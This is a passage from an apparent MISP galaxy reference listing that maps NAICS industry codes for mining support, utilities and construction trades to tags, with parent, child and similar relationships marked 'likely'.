The tag is: misp-galaxy:naics="212323"

212323 has relationships with:

  • child-of: misp-galaxy:naics="2123" with estimative-language:likelihood-probability="likely"

21239

Other Nonmetallic Mineral Mining and Quarrying

The tag is: misp-galaxy:naics="21239"

21239 has relationships with:

  • child-of: misp-galaxy:naics="2123" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="212390" with estimative-language:likelihood-probability="likely"

212390

Other Nonmetallic Mineral Mining and Quarrying

The tag is: misp-galaxy:naics="212390"

212390 has relationships with:

  • child-of: misp-galaxy:naics="2123" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="21239" with estimative-language:likelihood-probability="likely"

213

Support Activities for Mining

The tag is: misp-galaxy:naics="213"

213 has relationships with:

  • child-of: misp-galaxy:naics="21" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="2131" with estimative-language:likelihood-probability="likely"

2131

Support Activities for Mining

The tag is: misp-galaxy:naics="2131"

2131 has relationships with:

  • child-of: misp-galaxy:naics="213" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="21311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="213111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="213112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="213113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="213114" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="213115" with estimative-language:likelihood-probability="likely"

21311

Support Activities for Mining

The tag is: misp-galaxy:naics="21311"

21311 has relationships with:

  • child-of: misp-galaxy:naics="2131" with estimative-language:likelihood-probability="likely"

213111

Drilling Oil and Gas Wells

The tag is: misp-galaxy:naics="213111"

213111 has relationships with:

  • child-of: misp-galaxy:naics="2131" with estimative-language:likelihood-probability="likely"

213112

Support Activities for Oil and Gas Operations

The tag is: misp-galaxy:naics="213112"

213112 has relationships with:

  • child-of: misp-galaxy:naics="2131" with estimative-language:likelihood-probability="likely"

213113

Support Activities for Coal Mining

The tag is: misp-galaxy:naics="213113"

213113 has relationships with:

  • child-of: misp-galaxy:naics="2131" with estimative-language:likelihood-probability="likely"

213114

Support Activities for Metal Mining

The tag is: misp-galaxy:naics="213114"

213114 has relationships with:

  • child-of: misp-galaxy:naics="2131" with estimative-language:likelihood-probability="likely"

213115

Support Activities for Nonmetallic Minerals (except Fuels) Mining

The tag is: misp-galaxy:naics="213115"

213115 has relationships with:

  • child-of: misp-galaxy:naics="2131" with estimative-language:likelihood-probability="likely"

22

Utilities

The tag is: misp-galaxy:naics="22"

22 has relationships with:

  • parent-of: misp-galaxy:naics="221" with estimative-language:likelihood-probability="likely"

221

Utilities

The tag is: misp-galaxy:naics="221"

221 has relationships with:

  • child-of: misp-galaxy:naics="22" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="2211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="2212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="2213" with estimative-language:likelihood-probability="likely"

2211

Electric Power Generation, Transmission and Distribution

The tag is: misp-galaxy:naics="2211"

2211 has relationships with:

  • child-of: misp-galaxy:naics="221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="22111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="221111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="221112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="221113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="221114" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="221115" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="221116" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="221117" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="221118" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="22112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="221121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="221122" with estimative-language:likelihood-probability="likely"

22111

Electric Power Generation

The tag is: misp-galaxy:naics="22111"

22111 has relationships with:

  • child-of: misp-galaxy:naics="2211" with estimative-language:likelihood-probability="likely"

221111

Hydroelectric Power Generation

The tag is: misp-galaxy:naics="221111"

221111 has relationships with:

  • child-of: misp-galaxy:naics="2211" with estimative-language:likelihood-probability="likely"

221112

Fossil Fuel Electric Power Generation

The tag is: misp-galaxy:naics="221112"

221112 has relationships with:

  • child-of: misp-galaxy:naics="2211" with estimative-language:likelihood-probability="likely"

221113

Nuclear Electric Power Generation

The tag is: misp-galaxy:naics="221113"

221113 has relationships with:

  • child-of: misp-galaxy:naics="2211" with estimative-language:likelihood-probability="likely"

221114

Solar Electric Power Generation

The tag is: misp-galaxy:naics="221114"

221114 has relationships with:

  • child-of: misp-galaxy:naics="2211" with estimative-language:likelihood-probability="likely"

221115

Wind Electric Power Generation

The tag is: misp-galaxy:naics="221115"

221115 has relationships with:

  • child-of: misp-galaxy:naics="2211" with estimative-language:likelihood-probability="likely"

221116

Geothermal Electric Power Generation

The tag is: misp-galaxy:naics="221116"

221116 has relationships with:

  • child-of: misp-galaxy:naics="2211" with estimative-language:likelihood-probability="likely"

221117

Biomass Electric Power Generation

The tag is: misp-galaxy:naics="221117"

221117 has relationships with:

  • child-of: misp-galaxy:naics="2211" with estimative-language:likelihood-probability="likely"

221118

Other Electric Power Generation

The tag is: misp-galaxy:naics="221118"

221118 has relationships with:

  • child-of: misp-galaxy:naics="2211" with estimative-language:likelihood-probability="likely"

22112

Electric Power Transmission, Control, and Distribution

The tag is: misp-galaxy:naics="22112"

22112 has relationships with:

  • child-of: misp-galaxy:naics="2211" with estimative-language:likelihood-probability="likely"

221121

Electric Bulk Power Transmission and Control

The tag is: misp-galaxy:naics="221121"

221121 has relationships with:

  • child-of: misp-galaxy:naics="2211" with estimative-language:likelihood-probability="likely"

221122

Electric Power Distribution

The tag is: misp-galaxy:naics="221122"

221122 has relationships with:

  • child-of: misp-galaxy:naics="2211" with estimative-language:likelihood-probability="likely"

2212

Natural Gas Distribution

The tag is: misp-galaxy:naics="2212"

2212 has relationships with:

  • child-of: misp-galaxy:naics="221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="22121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="221210" with estimative-language:likelihood-probability="likely"

22121

Natural Gas Distribution

The tag is: misp-galaxy:naics="22121"

22121 has relationships with:

  • child-of: misp-galaxy:naics="2212" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="221210" with estimative-language:likelihood-probability="likely"

221210

Natural Gas Distribution

The tag is: misp-galaxy:naics="221210"

221210 has relationships with:

  • child-of: misp-galaxy:naics="2212" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="22121" with estimative-language:likelihood-probability="likely"

2213

Water, Sewage and Other Systems

The tag is: misp-galaxy:naics="2213"

2213 has relationships with:

  • child-of: misp-galaxy:naics="221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="22131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="221310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="22132" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="221320" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="22133" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="221330" with estimative-language:likelihood-probability="likely"

22131

Water Supply and Irrigation Systems

The tag is: misp-galaxy:naics="22131"

22131 has relationships with:

  • child-of: misp-galaxy:naics="2213" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="221310" with estimative-language:likelihood-probability="likely"

221310

Water Supply and Irrigation Systems

The tag is: misp-galaxy:naics="221310"

221310 has relationships with:

  • child-of: misp-galaxy:naics="2213" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="22131" with estimative-language:likelihood-probability="likely"

22132

Sewage Treatment Facilities

The tag is: misp-galaxy:naics="22132"

22132 has relationships with:

  • child-of: misp-galaxy:naics="2213" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="221320" with estimative-language:likelihood-probability="likely"

221320

Sewage Treatment Facilities

The tag is: misp-galaxy:naics="221320"

221320 has relationships with:

  • child-of: misp-galaxy:naics="2213" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="22132" with estimative-language:likelihood-probability="likely"

22133

Steam and Air-Conditioning Supply

The tag is: misp-galaxy:naics="22133"

22133 has relationships with:

  • child-of: misp-galaxy:naics="2213" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="221330" with estimative-language:likelihood-probability="likely"

221330

Steam and Air-Conditioning Supply

The tag is: misp-galaxy:naics="221330"

221330 has relationships with:

  • child-of: misp-galaxy:naics="2213" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="22133" with estimative-language:likelihood-probability="likely"

23

Construction

The tag is: misp-galaxy:naics="23"

23 has relationships with:

  • parent-of: misp-galaxy:naics="236" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="237" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238" with estimative-language:likelihood-probability="likely"

236

Construction of Buildings

The tag is: misp-galaxy:naics="236"

236 has relationships with:

  • child-of: misp-galaxy:naics="23" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="2361" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="2362" with estimative-language:likelihood-probability="likely"

2361

Residential Building Construction

The tag is: misp-galaxy:naics="2361"

2361 has relationships with:

  • child-of: misp-galaxy:naics="236" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="236115" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="236116" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="236117" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="236118" with estimative-language:likelihood-probability="likely"

23611

Residential Building Construction

The tag is: misp-galaxy:naics="23611"

23611 has relationships with:

  • child-of: misp-galaxy:naics="2361" with estimative-language:likelihood-probability="likely"

236115

New Single-Family Housing Construction (except For-Sale Builders)

The tag is: misp-galaxy:naics="236115"

236115 has relationships with:

  • child-of: misp-galaxy:naics="2361" with estimative-language:likelihood-probability="likely"

236116

New Multifamily Housing Construction (except For-Sale Builders)

The tag is: misp-galaxy:naics="236116"

236116 has relationships with:

  • child-of: misp-galaxy:naics="2361" with estimative-language:likelihood-probability="likely"

236117

New Housing For-Sale Builders

The tag is: misp-galaxy:naics="236117"

236117 has relationships with:

  • child-of: misp-galaxy:naics="2361" with estimative-language:likelihood-probability="likely"

236118

Residential Remodelers

The tag is: misp-galaxy:naics="236118"

236118 has relationships with:

  • child-of: misp-galaxy:naics="2361" with estimative-language:likelihood-probability="likely"

2362

Nonresidential Building Construction

The tag is: misp-galaxy:naics="2362"

2362 has relationships with:

  • child-of: misp-galaxy:naics="236" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23621" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="236210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23622" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="236220" with estimative-language:likelihood-probability="likely"

23621

Industrial Building Construction

The tag is: misp-galaxy:naics="23621"

23621 has relationships with:

  • child-of: misp-galaxy:naics="2362" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="236210" with estimative-language:likelihood-probability="likely"

236210

Industrial Building Construction

The tag is: misp-galaxy:naics="236210"

236210 has relationships with:

  • child-of: misp-galaxy:naics="2362" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23621" with estimative-language:likelihood-probability="likely"

23622

Commercial and Institutional Building Construction

The tag is: misp-galaxy:naics="23622"

23622 has relationships with:

  • child-of: misp-galaxy:naics="2362" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="236220" with estimative-language:likelihood-probability="likely"

236220

Commercial and Institutional Building Construction

The tag is: misp-galaxy:naics="236220"

236220 has relationships with:

  • child-of: misp-galaxy:naics="2362" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23622" with estimative-language:likelihood-probability="likely"

237

Heavy and Civil Engineering Construction

The tag is: misp-galaxy:naics="237"

237 has relationships with:

  • child-of: misp-galaxy:naics="23" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="2371" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="2372" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="2373" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="2379" with estimative-language:likelihood-probability="likely"

2371

Utility System Construction

The tag is: misp-galaxy:naics="2371"

2371 has relationships with:

  • child-of: misp-galaxy:naics="237" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23711" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="237110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23712" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="237120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23713" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="237130" with estimative-language:likelihood-probability="likely"

23711

Water and Sewer Line and Related Structures Construction

The tag is: misp-galaxy:naics="23711"

23711 has relationships with:

  • child-of: misp-galaxy:naics="2371" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="237110" with estimative-language:likelihood-probability="likely"

237110

Water and Sewer Line and Related Structures Construction

The tag is: misp-galaxy:naics="237110"

237110 has relationships with:

  • child-of: misp-galaxy:naics="2371" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23711" with estimative-language:likelihood-probability="likely"

23712

Oil and Gas Pipeline and Related Structures Construction

The tag is: misp-galaxy:naics="23712"

23712 has relationships with:

  • child-of: misp-galaxy:naics="2371" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="237120" with estimative-language:likelihood-probability="likely"

237120

Oil and Gas Pipeline and Related Structures Construction

The tag is: misp-galaxy:naics="237120"

237120 has relationships with:

  • child-of: misp-galaxy:naics="2371" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23712" with estimative-language:likelihood-probability="likely"

23713

Power and Communication Line and Related Structures Construction

The tag is: misp-galaxy:naics="23713"

23713 has relationships with:

  • child-of: misp-galaxy:naics="2371" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="237130" with estimative-language:likelihood-probability="likely"

237130

Power and Communication Line and Related Structures Construction

The tag is: misp-galaxy:naics="237130"

237130 has relationships with:

  • child-of: misp-galaxy:naics="2371" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23713" with estimative-language:likelihood-probability="likely"

2372

Land Subdivision

The tag is: misp-galaxy:naics="2372"

2372 has relationships with:

  • child-of: misp-galaxy:naics="237" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23721" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="237210" with estimative-language:likelihood-probability="likely"

23721

Land Subdivision

The tag is: misp-galaxy:naics="23721"

23721 has relationships with:

  • child-of: misp-galaxy:naics="2372" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="237210" with estimative-language:likelihood-probability="likely"

237210

Land Subdivision

The tag is: misp-galaxy:naics="237210"

237210 has relationships with:

  • child-of: misp-galaxy:naics="2372" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23721" with estimative-language:likelihood-probability="likely"

2373

Highway, Street, and Bridge Construction

The tag is: misp-galaxy:naics="2373"

2373 has relationships with:

  • child-of: misp-galaxy:naics="237" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23731" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="237310" with estimative-language:likelihood-probability="likely"

23731

Highway, Street, and Bridge Construction

The tag is: misp-galaxy:naics="23731"

23731 has relationships with:

  • child-of: misp-galaxy:naics="2373" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="237310" with estimative-language:likelihood-probability="likely"

237310

Highway, Street, and Bridge Construction

The tag is: misp-galaxy:naics="237310"

237310 has relationships with:

  • child-of: misp-galaxy:naics="2373" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23731" with estimative-language:likelihood-probability="likely"

2379

Other Heavy and Civil Engineering Construction

The tag is: misp-galaxy:naics="2379"

2379 has relationships with:

  • child-of: misp-galaxy:naics="237" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23799" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="237990" with estimative-language:likelihood-probability="likely"

23799

Other Heavy and Civil Engineering Construction

The tag is: misp-galaxy:naics="23799"

23799 has relationships with:

  • child-of: misp-galaxy:naics="2379" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="237990" with estimative-language:likelihood-probability="likely"

237990

Other Heavy and Civil Engineering Construction

The tag is: misp-galaxy:naics="237990"

237990 has relationships with:

  • child-of: misp-galaxy:naics="2379" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23799" with estimative-language:likelihood-probability="likely"

238

Specialty Trade Contractors

The tag is: misp-galaxy:naics="238"

238 has relationships with:

  • child-of: misp-galaxy:naics="23" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="2381" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="2382" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="2383" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="2389" with estimative-language:likelihood-probability="likely"

2381

Foundation, Structure, and Building Exterior Contractors

The tag is: misp-galaxy:naics="2381"

2381 has relationships with:

  • child-of: misp-galaxy:naics="238" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23811" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23812" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23813" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23814" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238140" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23815" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238150" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23816" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238160" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23817" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238170" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23819" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238190" with estimative-language:likelihood-probability="likely"

23811

Poured Concrete Foundation and Structure Contractors

The tag is: misp-galaxy:naics="23811"

23811 has relationships with:

  • child-of: misp-galaxy:naics="2381" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238110" with estimative-language:likelihood-probability="likely"

238110

Poured Concrete Foundation and Structure Contractors

The tag is: misp-galaxy:naics="238110"

238110 has relationships with:

  • child-of: misp-galaxy:naics="2381" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23811" with estimative-language:likelihood-probability="likely"

23812

Structural Steel and Precast Concrete Contractors

The tag is: misp-galaxy:naics="23812"

23812 has relationships with:

  • child-of: misp-galaxy:naics="2381" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238120" with estimative-language:likelihood-probability="likely"

238120

Structural Steel and Precast Concrete Contractors

The tag is: misp-galaxy:naics="238120"

238120 has relationships with:

  • child-of: misp-galaxy:naics="2381" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23812" with estimative-language:likelihood-probability="likely"

23813

Framing Contractors

The tag is: misp-galaxy:naics="23813"

23813 has relationships with:

  • child-of: misp-galaxy:naics="2381" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238130" with estimative-language:likelihood-probability="likely"

238130

Framing Contractors

The tag is: misp-galaxy:naics="238130"

238130 has relationships with:

  • child-of: misp-galaxy:naics="2381" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23813" with estimative-language:likelihood-probability="likely"

23814

Masonry Contractors

The tag is: misp-galaxy:naics="23814"

23814 has relationships with:

  • child-of: misp-galaxy:naics="2381" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238140" with estimative-language:likelihood-probability="likely"

238140

Masonry Contractors

The tag is: misp-galaxy:naics="238140"

238140 has relationships with:

  • child-of: misp-galaxy:naics="2381" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23814" with estimative-language:likelihood-probability="likely"

23815

Glass and Glazing Contractors

The tag is: misp-galaxy:naics="23815"

23815 has relationships with:

  • child-of: misp-galaxy:naics="2381" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238150" with estimative-language:likelihood-probability="likely"

238150

Glass and Glazing Contractors

The tag is: misp-galaxy:naics="238150"

238150 has relationships with:

  • child-of: misp-galaxy:naics="2381" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23815" with estimative-language:likelihood-probability="likely"

23816

Roofing Contractors

The tag is: misp-galaxy:naics="23816"

23816 has relationships with:

  • child-of: misp-galaxy:naics="2381" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238160" with estimative-language:likelihood-probability="likely"

238160

Roofing Contractors

The tag is: misp-galaxy:naics="238160"

238160 has relationships with:

  • child-of: misp-galaxy:naics="2381" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23816" with estimative-language:likelihood-probability="likely"

23817

Siding Contractors

The tag is: misp-galaxy:naics="23817"

23817 has relationships with:

  • child-of: misp-galaxy:naics="2381" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238170" with estimative-language:likelihood-probability="likely"

238170

Siding Contractors

The tag is: misp-galaxy:naics="238170"

238170 has relationships with:

  • child-of: misp-galaxy:naics="2381" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23817" with estimative-language:likelihood-probability="likely"

23819

Other Foundation, Structure, and Building Exterior Contractors

The tag is: misp-galaxy:naics="23819"

23819 has relationships with:

  • child-of: misp-galaxy:naics="2381" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238190" with estimative-language:likelihood-probability="likely"

238190

Other Foundation, Structure, and Building Exterior Contractors

The tag is: misp-galaxy:naics="238190"

238190 has relationships with:

  • child-of: misp-galaxy:naics="2381" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23819" with estimative-language:likelihood-probability="likely"

2382

Building Equipment Contractors

The tag is: misp-galaxy:naics="2382"

2382 has relationships with:

  • child-of: misp-galaxy:naics="238" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23821" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23822" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238220" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23829" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238290" with estimative-language:likelihood-probability="likely"

23821

Electrical Contractors and Other Wiring Installation Contractors

The tag is: misp-galaxy:naics="23821"

23821 has relationships with:

  • child-of: misp-galaxy:naics="2382" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238210" with estimative-language:likelihood-probability="likely"

238210

Electrical Contractors and Other Wiring Installation Contractors

The tag is: misp-galaxy:naics="238210"

238210 has relationships with:

  • child-of: misp-galaxy:naics="2382" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23821" with estimative-language:likelihood-probability="likely"

23822

Plumbing, Heating, and Air-Conditioning Contractors

The tag is: misp-galaxy:naics="23822"

23822 has relationships with:

  • child-of: misp-galaxy:naics="2382" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238220" with estimative-language:likelihood-probability="likely"

238220

Plumbing, Heating, and Air-Conditioning Contractors

The tag is: misp-galaxy:naics="238220"

238220 has relationships with:

  • child-of: misp-galaxy:naics="2382" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23822" with estimative-language:likelihood-probability="likely"

23829

Other Building Equipment Contractors

The tag is: misp-galaxy:naics="23829"

23829 has relationships with:

  • child-of: misp-galaxy:naics="2382" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238290" with estimative-language:likelihood-probability="likely"

238290

Other Building Equipment Contractors

The tag is: misp-galaxy:naics="238290"

238290 has relationships with:

  • child-of: misp-galaxy:naics="2382" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23829" with estimative-language:likelihood-probability="likely"

2383

Building Finishing Contractors

The tag is: misp-galaxy:naics="2383"

2383 has relationships with:

  • child-of: misp-galaxy:naics="238" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23831" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23832" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238320" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23833" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238330" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23834" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238340" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23835" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238350" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23839" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238390" with estimative-language:likelihood-probability="likely"

23831

Drywall and Insulation Contractors

The tag is: misp-galaxy:naics="23831"

23831 has relationships with:

  • child-of: misp-galaxy:naics="2383" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238310" with estimative-language:likelihood-probability="likely"

238310

Drywall and Insulation Contractors

The tag is: misp-galaxy:naics="238310"

238310 has relationships with:

  • child-of: misp-galaxy:naics="2383" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23831" with estimative-language:likelihood-probability="likely"

23832

Painting and Wall Covering Contractors

The tag is: misp-galaxy:naics="23832"

23832 has relationships with:

  • child-of: misp-galaxy:naics="2383" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238320" with estimative-language:likelihood-probability="likely"

238320

Painting and Wall Covering Contractors

The tag is: misp-galaxy:naics="238320"

238320 has relationships with:

  • child-of: misp-galaxy:naics="2383" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23832" with estimative-language:likelihood-probability="likely"

23833

Flooring Contractors

The tag is: misp-galaxy:naics="23833"

23833 has relationships with:

  • child-of: misp-galaxy:naics="2383" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238330" with estimative-language:likelihood-probability="likely"

238330

Flooring Contractors

The tag is: misp-galaxy:naics="238330"

238330 has relationships with:

  • child-of: misp-galaxy:naics="2383" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23833" with estimative-language:likelihood-probability="likely"

23834

Tile and Terrazzo Contractors

The tag is: misp-galaxy:naics="23834"

23834 has relationships with:

  • child-of: misp-galaxy:naics="2383" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238340" with estimative-language:likelihood-probability="likely"

238340

Tile and Terrazzo Contractors

The tag is: misp-galaxy:naics="238340"

238340 has relationships with:

  • child-of: misp-galaxy:naics="2383" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23834" with estimative-language:likelihood-probability="likely"

23835

Finish Carpentry Contractors

The tag is: misp-galaxy:naics="23835"

23835 has relationships with:

  • child-of: misp-galaxy:naics="2383" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238350" with estimative-language:likelihood-probability="likely"

238350

Finish Carpentry Contractors

The tag is: misp-galaxy:naics="238350"

238350 has relationships with:

  • child-of: misp-galaxy:naics="2383" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23835" with estimative-language:likelihood-probability="likely"

23839

Other Building Finishing Contractors

The tag is: misp-galaxy:naics="23839"

23839 has relationships with:

  • child-of: misp-galaxy:naics="2383" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238390" with estimative-language:likelihood-probability="likely"

238390

Other Building Finishing Contractors

The tag is: misp-galaxy:naics="238390"

238390 has relationships with:

